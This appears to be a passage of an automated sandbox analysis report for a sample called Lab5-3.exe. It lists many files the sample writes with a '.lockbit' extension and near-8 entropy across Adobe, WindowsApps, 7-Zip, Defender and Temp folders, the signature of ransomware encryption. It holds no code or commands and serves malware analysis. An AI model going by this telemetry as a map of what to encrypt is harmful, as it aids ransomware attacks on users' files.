                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome__crx_fmgjjmmmlfcabfkddbjimcfncm.lockbit entropy: 7.99577050113Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}.lockbit entropy: 7.99552920558Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}.lockbit entropy: 7.99482147006Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_.lockbit entropy: 7.99563621928Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome__crx_fhihpiojkboajapmgkhlnakfjf.lockbit entropy: 7.9952298929Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_MSOUC_EXE_15.lockbit entropy: 7.99463985871Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\CourierStd-Oblique.otf.lockbit entropy: 7.99447661114Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js.lockbit entropy: 7.99134134533Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png.lockbit entropy: 7.99727159948Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\fr-fr\NativeRS.webm.lockbit entropy: 7.99246081044Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{E7A33582-E908-3379-5368-5999454DCD83}.lockbit entropy: 7.99471731635Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ru_135x40.svg.lockbit entropy: 7.99250466738Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_en_135x40.svg.lockbit entropy: 7.99200917815Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\appstore.png.lockbit entropy: 7.99749043135Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MsSense.exe.mui.lockbit entropy: 7.99445726931Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\AdobePIStd.otf.lockbit entropy: 7.99788044008Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\CourierStd-BoldOblique.otf.lockbit entropy: 7.99430069039Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_de_135x40.svg.lockbit entropy: 7.99048003501Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\MinionPro-Bold.otf.lockbit entropy: 7.99912417082Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\MyriadPro-Bold.otf.lockbit entropy: 7.9980047441Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg.lockbit entropy: 7.99169801189Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\MinionPro-Regular.otf.lockbit entropy: 7.99913768381Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\MyriadPro-BoldIt.otf.lockbit entropy: 7.99838819273Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\ui-strings.js.lockbit entropy: 7.99194764151Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.lockbit entropy: 7.99146679564Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags@2x.png.lockbit entropy: 7.99907567558Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.lockbit entropy: 7.99841991563Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\ui-strings.js.lockbit entropy: 7.99202791919Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.lockbit entropy: 7.99911351921Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\SY______.PFB.lockbit entropy: 7.99492842136Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\MyriadPro-Regular.otf.lockbit entropy: 7.99787441563Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.lockbit entropy: 7.99216865567Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99782877887Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml entropy: 7.99487886687Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99668203146Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftEdge.Stable_117.0.2045.47_neutral__8wekyb3d8bbwe\Logo.png entropy: 7.99429417176Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml entropy: 7.99365095909Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99757849177Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat entropy: 7.99574230989Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99665241411Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.2f73246d.pri entropy: 7.99424746243Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml entropy: 7.99421701632Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.45e00f56.pri entropy: 7.99513075691Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99778856658Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat entropy: 7.99025545066Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99424651126Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99840217126Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat entropy: 7.99112010702Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml entropy: 7.99383571724Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.People_2019.305.632.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml entropy: 7.99047443994Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99612640738Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.b19e8503.pri entropy: 7.99734510063Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml entropy: 7.99373071115Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.ebbfea5f.pri entropy: 7.99079015538Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.ScreenSketch_2019.904.1644.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml entropy: 7.99361176306Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\read_EX_Challenger_1-2x.png.lockbit entropy: 7.99688650796Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\read_EX_Challenger_1_non_EN-2x.png.lockbit entropy: 7.99609110926Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\QRCode.png.lockbit entropy: 7.99462605144Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxBlockMap.xml entropy: 7.99886746596Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign-2x.png.lockbit entropy: 7.9962044333Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\FillnSign_visual.svg.lockbit entropy: 7.9942288207Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-acro-es_es.gif.lockbit entropy: 7.99934182488Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\read_EX_Challenger_1.png.lockbit entropy: 7.99064944063Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\read_EX_Challenger_1_DT.png.lockbit entropy: 7.99056153416Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags.png.lockbit entropy: 7.99737168416Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png.lockbit entropy: 7.99093118856Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png.lockbit entropy: 7.99782021159Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile.png.lockbit entropy: 7.99432097582Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wct38F0.tmp.lockbit entropy: 7.99749541306Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wct150C.tmp.lockbit entropy: 7.99776228954Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64.lockbit entropy: 7.99708251881Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.lockbit entropy: 7.99760193161Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags@2x.png.lockbit entropy: 7.99911769739Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-4x.png.lockbit entropy: 7.99419442681Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wctE4A4.tmp.lockbit entropy: 7.99748803301Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wct49A7.tmp.lockbit entropy: 7.99666172615Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wctDB2E.tmp.lockbit entropy: 7.99732336556Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-3x.png.lockbit entropy: 7.99078283975Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf-2x.png.lockbit entropy: 7.99103935541Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wct33D7.tmp.lockbit entropy: 7.9971279919Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wct443C.tmp.lockbit entropy: 7.99719074532Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wctF411.tmp.lockbit entropy: 7.99736232581Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png.lockbit entropy: 7.99650880467Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\AppStore_icon.svg.lockbit entropy: 7.99191211987Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\AppStore_icon.svg.lockbit entropy: 7.99077437721Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\AppStore_icon.svg.lockbit entropy: 7.99182454211Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-acro-en_us_2x.gif.lockbit entropy: 7.99743424417Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache.lockbit entropy: 7.99896868649Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_InternetExplorer_Default.lockbit entropy: 7.99577290596Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\wctEA40.tmp.lockbit entropy: 7.99750637287Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome__crx_kefjledonknomlcbpllchaibag.lockbit entropy: 7.99506241273Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.cache.lockbit entropy: 7.99916335466Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\AppStore_icon.svg.lockbit entropy: 7.99166017293Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text-2x.png.lockbit entropy: 7.99519603692Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}.lockbit entropy: 7.99456372773Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reader_signin_background.svg.lockbit entropy: 7.99914581817Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Scan_visual.svg.lockbit entropy: 7.99459638177Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg.lockbit entropy: 7.99337606179Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg.lockbit entropy: 7.99060606873Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}.lockbit entropy: 7.9950748332Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}.lockbit entropy: 7.9950287769Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js.lockbit entropy: 7.99696683831Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{116229A7-9A3B-2078-DB5F-B5A20811242C}.lockbit entropy: 7.99476369853Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view-2x.png.lockbit entropy: 7.99411516611Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png.lockbit entropy: 7.99675954653Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png.lockbit entropy: 7.99083496299Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\AppStore_icon.svg.lockbit entropy: 7.99293088541Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan.png.lockbit entropy: 7.99295075236Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}.lockbit entropy: 7.9947943357Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_EXCEL_EXE_15.lockbit entropy: 7.99566140851Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}.lockbit entropy: 7.99490983778Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}.lockbit entropy: 7.99538312222Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{F1118828-A0CC-5FEB-85C9-DBFFDF98434A}.lockbit entropy: 7.99496414913Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome__crx_mpnpojknpmnjdcgaaiekajbnjb.lockbit entropy: 7.99494303658Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png.lockbit entropy: 7.99217528775Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\AppStore_icon.svg.lockbit entropy: 7.99241150801Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js.lockbit entropy: 7.99869671707Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt.lockbit entropy: 7.99091505634Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt.lockbit entropy: 7.99144665689Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\7-Zip\Lang\mng.txt.lockbit entropy: 7.9915827798Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.lockbit entropy: 7.99375498855Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.lockbit entropy: 7.99899817873Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.lockbit entropy: 7.99697449452Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak.lockbit entropy: 7.99713722245Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.lockbit entropy: 7.9941264669Jump to dropped file
